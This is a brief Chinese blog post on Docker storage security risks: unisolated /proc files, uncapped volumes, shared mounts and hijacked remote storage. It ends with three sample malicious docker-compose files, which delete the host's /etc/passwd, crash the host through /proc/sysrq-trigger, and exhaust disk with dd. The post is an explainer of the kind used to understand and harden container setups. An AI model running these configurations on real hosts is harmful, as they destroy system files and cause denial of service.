版权声明: https://blog.csdn.net/m0_37552052/article/details/78909761
Docker存储安全
Docker存储方面的安全隐患
挂载宿主机的敏感目录到容器中,从而造成容器可以对host敏感文件进行任意操作
以下这些敏感目录及文件没有进行隔离:
/proc/fs 文件系统信息
/proc/meminfo RAM使用的相关信息
/proc/cpuinfo CPU的相关信息
/proc/sysrq-trigger 使用echo命令来写这个文件的时候,远程root用户可以执行大 多数的系统请求关键命令,就好像在本地终端执行一样
/proc/irq 中断请求设备信息/proc/bus 系统总线(Bus)信息
现在还无法设置volume的容量,一旦容器疯狂创建文件,将会耗尽主机的资源,实现dos攻击
假设一个Web容器将网站挂载主机的某一目录下,当其它容器也挂载这个目录或其父目录时,其他容器就可以对Web容器的网站进行任意操作了
跨Docker主机存储时,若远程Storage Provide被劫持,则存储的敏感数据直接被盗取
恶意docker-compose文件
第一个docker-compose挂载主机的/etc/passwd文件并进行删除操作
test:
image: ubuntu:14.04
volumes:
- /etc:/test
command: rm /test/passwd
第二个docker-compose通过提权并操作/proc/sysrq-trigger文件使得主机挂死
test:
image: ubuntu:14.04
privileged: true
command: /bin/bash -c 'echo "c" > /proc/sysrq-trigger'
第三个docker-compose通过创建超大容量的文件使得CPU负载过重
test:
image: ubuntu:14.04
volume:
- "/test"
command: dd if=/dev/zero of=/test/test bs=1M count=100000